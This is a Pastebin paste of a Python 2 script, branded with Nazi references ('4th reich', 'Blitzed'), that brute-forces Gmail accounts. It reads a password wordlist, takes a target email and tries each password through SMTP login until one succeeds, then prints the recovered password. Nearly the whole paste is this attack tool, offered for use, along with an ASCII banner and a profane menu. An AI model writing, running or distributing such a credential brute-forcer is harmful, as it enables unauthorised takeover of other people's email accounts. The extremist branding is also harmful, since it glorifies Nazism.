skip420

G_4th_Reich_BruteMail

Apr 12th, 2020
286
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.95 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3.  
  4. import smtplib
  5. from os import system
  6.  
  7. def main():
  8.    print '================================================='
  9.    print '                                                 '
  10.    print '================================================='
  11.    print '               ++++++++++++++++++++              '
  12.    print '\n                                               '
  13.    print '                                                 '
  14.    print '                                                 '
  15.    print '                                                 '
  16.    print '           Skip420                               '
  17.    print '       _,.                   '
  18.    print '     ,` -.)                  '
  19.    print '    ( _/-\\-._               '
  20.    print '   /,|`--._,-^|            / '
  21.    print '   \_| |`-._/||           /  '
  22.    print '     |  `-, / |         /  / '
  23.    print '     |     || |        /  /  '
  24.    print '      `r-._||/   __   /  /   '
  25.      
  26.  
  27. main()
  28. print '[1] 4th reich'
  29. print '[2] go fuck yourself'
  30. option = input('==>')
  31. if option == 1:
  32.    file_path = raw_input('path of passwords file :')
  33. else:
  34.    system('clear')
  35.    exit()
  36. pass_file = open(file_path,'r')
  37. pass_list = pass_file.readlines()
  38. def login():
  39.     i = 0
  40.     user_name = raw_input('target email :')
  41.     server = smtplib.SMTP_SSL('smtp.gmail.com', 465,587)
  42.     server.ehlo()
  43.     for password in pass_list:
  44.       i = i + 1
  45.       print str(i) + '/' + str(len(pass_list))
  46.       try:
  47.          server.login(user_name, password)
  48.          system('clear')
  49.          main()
  50.          print '\n'
  51.          print '[+] Blitzed!:' + password + '     ^_^'
  52.          break
  53.       except smtplib.SMTPAuthenticationError as e:
  54.          error = str(e)
  55.          if error[14] == '<':
  56.             system('clear')
  57.             main()
  58.             print '[+] Blitzed! :' + password + '     ^_^'
  59.  
  60.             break
  61.          else:
  62.             print '[!] password not found => ' + password
  63. login()
Add Comment
Please, Sign In to add comment